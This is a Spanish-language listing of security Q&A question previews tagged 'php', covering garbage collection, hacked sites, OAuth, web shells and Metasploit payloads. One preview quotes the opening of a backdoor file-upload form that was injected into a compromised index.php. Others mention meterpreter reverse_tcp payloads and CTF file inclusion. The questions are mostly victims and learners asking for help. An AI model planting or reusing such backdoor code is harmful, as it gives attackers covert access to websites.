Preguntas con etiqueta 'php'

preguntas con etiqueta
0
respuestas

Recolección de basura y vulnerabilidades

Si estoy usando PHP vainilla (v 5.x) estilo de procedimiento , ¿habrá recolección de basura? Por lo que entiendo de GC, es la administración de memoria eliminar un objeto no utilizado. Esto me dice que usar el estilo de procedimiento de PHP (-...
hecha 07.08.2018 - 13:01
1
respuesta

Mi sitio fue hackeado y ha inyectado código en index.php y 404.php [duplicado]

Aquí está el código inyectado en index.php if(@isset($_GET[bots])){ echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">'; echo '<input type="file" name="file"><input name="gol...
hecha 08.08.2018 - 09:24
3
respuestas

¿Hay algún error en particular al poner un código de autenticación en los correos electrónicos de marketing?

He estado trabajando en mi primer proyecto, y mis usuarios registrados iniciales no han sido particularmente pegajosos. Me gustaría enviarles un correo electrónico con algunas noticias e información y hacer que inicien sesión de forma instantáne...
hecha 21.08.2018 - 00:52
0
respuestas

PoC para la vulnerabilidad de TCPDF

Estoy haciendo algunos desafíos como parte de un CTF interno que estamos hospedando. Como parte de los desafíos, una de las cosas que planeaba entregar era File Inclusion usando una vulnerabilidad en una determinada versión de TCPDF. E...
hecha 27.02.2018 - 04:37
1
respuesta

¿Qué se podría hacer con el shell web en un dispositivo Android sin rootear?

¿Es posible controlar un dispositivo Android sin rootear a través de un shell web? He estado intentando ejecutar varios shells de php, pero toda la respuesta son declaraciones de error como esta php está instalado y todas las demás...
hecha 18.02.2018 - 17:01
0
respuestas

Cómo configurar Oauth2 en el servidor web del usuario

Estoy escribiendo un complemento de Wordpress que, espero, permitirá que el administrador de Wordpress le otorgue acceso al complemento a su Google Cal y Contactos, y continúe accediendo a esos servicios incluso cuando el administrador no haya i...
hecha 05.01.2018 - 06:29
0
respuestas

¿Qué cifrado usar cuando el usuario necesita memorizar la clave?

Hace poco me metí en los desafíos de código, hechos por mis amigos, yo mismo o alguna otra fuente que tiene que ver con la seguridad. Ahora, tengo el siguiente escenario: <Login form> | | [ Proccess login ] --> (Valid)...
hecha 15.12.2017 - 20:30
1
respuesta

Trabajar directamente con $ _POST ¿es seguro?

Trabajo con php durante unas semanas y me disculpo si la pregunta es tan banal y tonta. Pero busque scrypt php aquí y sepa que algunos prefieren verificar los valores recibidos de un formulario directamente con $ _POST, mientras que otros primer...
hecha 06.09.2017 - 20:17
0
respuestas

php reverse_tcp payload murió

Usando dos exploits diferentes, uno es: cargue meterpreter.php al servidor web usando las credenciales predeterminadas de WebDav y el otro es una ejecución remota vuln en tikiwiki. Para el primer exploit, creé la carga útil utilizando:...
hecha 22.08.2017 - 13:21
3
respuestas

forzar la carga de un archivo a un servidor con un puerto abierto [duplicado]

Recientemente mi servidor web fue hackeado. alguien subió un gestor de archivos php llamado extplor y cambió todas mis páginas web y me preguntaba qué formas podrían haber cargado algo en mi servidor sin acceso directo a él. Sé que a veces se...
hecha 22.11.2017 - 16:23